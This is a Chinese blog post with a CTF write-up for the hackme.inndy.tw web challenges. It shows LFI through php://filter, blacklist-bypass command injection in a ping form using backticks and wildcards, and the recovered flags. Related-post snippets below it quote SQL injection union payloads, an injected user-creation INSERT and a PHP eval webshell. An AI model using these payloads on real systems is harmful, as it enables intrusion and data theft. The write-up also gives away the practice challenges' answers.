hackme 边做边记录

最新推荐文章于 2024-09-03 20:00:15 发布
最新推荐文章于 2024-09-03 20:00:15 发布
阅读量655 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: web 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m1785717/article/details/83277498
本文详细介绍了通过LFI(本地文件包含)漏洞读取敏感文件的过程。从发现提示到利用封装协议读取PHP源码,再到解码获取flag,展示了完整的攻击流程。同时,文章还涉及命令执行和黑名单绕过技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. LFI

在login界面查看源代码得到提示

<a href="?page=pages/flag">Flag</a>

想到使用封装协议读取php文件,URL如下:

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

得到php源码

Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K

Can you read the flag<?php require('config.php'); ?>?

接着包含config文件,url如下:

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config

读取php源码:

PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==

解密得到flag:FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}

  1. homepage

在源代码里面看到js:<script src="cute.js"></script>
点进去是aaencode编码,解码成一个二维码,扫描得flag:FLAG{Oh, You found me!!!!!! Yeeeeeeee.}

  1. ping
    命令执行,看到黑名单,没有过滤可以进行命令替换的反引号` 和$()
`ls`

或者

$(ls)

读到flag.php,黑名单过滤了flag,可以用?来通配,由于限制输入长度,所以用`

`sort ????????`

得到flag:FLAG{ping_$(capture-the-flag)_UtUbtnvY5F9Hn5dR}

hackme(web wp)
Xi4or0uji
09-06 4469
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&amp;id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&amp;id=-1 union select 1,2,(select table_name fr...
hackme-1打靶记录
wwd180的博客
06-12 162
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
HACK ME靶机
qq_49101841的博客
10-01 1343
❀本篇关于信息安全实训时靶场训练的操作笔记。
【靶机渗透】HACKME: 1
安全狐
07-19 1082
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
hackme通关攻略
m0_73771249的博客
09-03 723
输入'报错,#闭合成功,共有三列。使用BP抓包,修改后缀名上传。
[攻防世界]hackme
逆向萌新的博客
06-23 329
[攻防世界]hackme
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 7269
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
012-Web安全基础8 - 实战练习.pptx
10-22
此外,攻击者甚至可能利用这种注入尝试插入新的用户记录,如 `'INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--`,这将创建一个名为...
012-Web安全基础8 - 实战练习1
08-03
INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--`。这样,他们可以创建新的用户账号,增加攻击的深度和复杂性。 6. **访问他人...
从webshell的视角谈攻防对抗
si1ence的博客
12-05 917
0x0 背景 由于参加最近特殊多人活动的原因,很多渗透攻击武器也进行了对应的更新。冰蝎出了3.0版本、甚至还有好几个beta版本;还朋友圈还出了一个据说比冰蝎3.0还厉害的神器”哥斯拉”全部类型的shell均过市面所有静态查杀、流量加密过市面全部流量waf、自带的插件是冰蝎、蚁剑不能比拟的;看名字就很厉害的样子,看描述更是功能强大 不禁内心一阵酸爽。 丰富了自己部分武器库之后很多白帽子喜悦之情溢于言表,身很多小伙伴甚至都开始在本地开始测试了;几家欢喜几家愁,总一些人的快乐终究是建立在一些人的痛苦之上
Hackme-Crypto-wp
qq_41509200的博客
09-13 695
Hackme-Crypto-wp 背景: 这几天老师要求我们把hackme的题目出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、easy 526b78425233745561476c7a49476c7a4947566863336b7349484a705a3268305033303d 利用经验觉得像16进制转字符串,于是找个在线网站试试 还真有点...
Hackme-Web-wp
qq_41509200的博客
09-13 2314
Hackme-Web-wp 背景: 这几天老师要求我们把hackme的题目出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、hide and seek Can you see me? I’m so close to you but you can’t see me. 题目描述说离我很近,于是便翻翻网页源代码,果真发现了flag FLAG{0h U...
Hackme Writeup
热门推荐
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
攻防世界--hackme
Hk_Mayfly的博客
01-18 373
测试链接:https://adworld.xctf.org.cn/media/task/attachments/33009710e3f44f04b5a4cdbaaa46f00a 1.准备 获取信息 64位文件 2.IDA打开 __int64 __fastcall sub_400F8E(__int64 a1, __int64 a2) { char v3[136]; // [rs...
Hackme靶机通关攻略
qq_65852138的博客
09-03 461
Hackme靶机通关攻略
攻防世界-hackme
qq_70851535的博客
11-19 393
逆向分析
Hackme-Misc-wp
qq_41509200的博客
09-13 1433
Hackme-Misc-wp 背景: 这几天老师要求我们把hackme的题目出来,于是便开始了新的征程,一定把全部flag找出来 题目及解题思路 1、Flag All flags are in this format: FLAG{This is flag’s format} 题目描述中就是flag FLAG{This is flag's format} 2、corgi can fly ...
攻防世界逆向高手题之hackme
沐一 · 林 的博客
08-30 1167
攻防世界逆向高手题之hackme 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的hackme 下载附件,照例扔入exeinfope中查看信息: 64位ELF文件无壳,照例扔入IDA64中查看伪代码信息,有main函数看main函数,结果没有main函数: . 没有main函数就运行程序收集显示信息: 找到两个字符串,直接在strings窗口双击跟踪,找到主要逻辑函数: . 这里积累第一个经验:如第一个红框所示, sub_407470((unsigned int)“Give me the
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 690
因为rsbo和rsbo2是同一题,所以就直接rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
hackme靶机通关
最新发布
12-27
### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以尝试使用特定的payload来枚举表名[^4]。 ```sql -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' # ``` 此语句将返回名为 `webapphacking` 的数据库下的所有表格名称列表,这有助于进一步了解应用结构并发现潜在的目标数据存储位置。 #### 发现并利用文件上传功能实现远程代码执行 某些情况下,Web应用程序可能提供文件上传的功能。如果这种机制缺乏足够的验证措施,则可能会被用来上载恶意脚本文件(如PHP木马)。一旦成功上传了一句话木马到服务器端,就可以通过向其发送命令请求来进行后续操作[^5]。 ```php <?php phpinfo(); eval($_POST['cmd']); ?> ``` 这段简单的PHP代码片段定义了一个后门接口,它会响应来自客户端提交的数据包中携带的指令参数(`cmd`),从而实现了远程控制的能力。为了定位已上传的一句话木马的确切路径,通常还需要借助目录遍历技术找到对应的URL地址[^3]。 #### 权限提升至超级用户级别 当获得了初步的访问权限之后,下一步便是寻找能够帮助提权的信息或配置错误之处。例如,可以通过查找管理员账户凭证或者其他敏感资源来完成这一过程。最终目的是以更高的特权状态运行命令,进而完全掌控整个系统环境[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值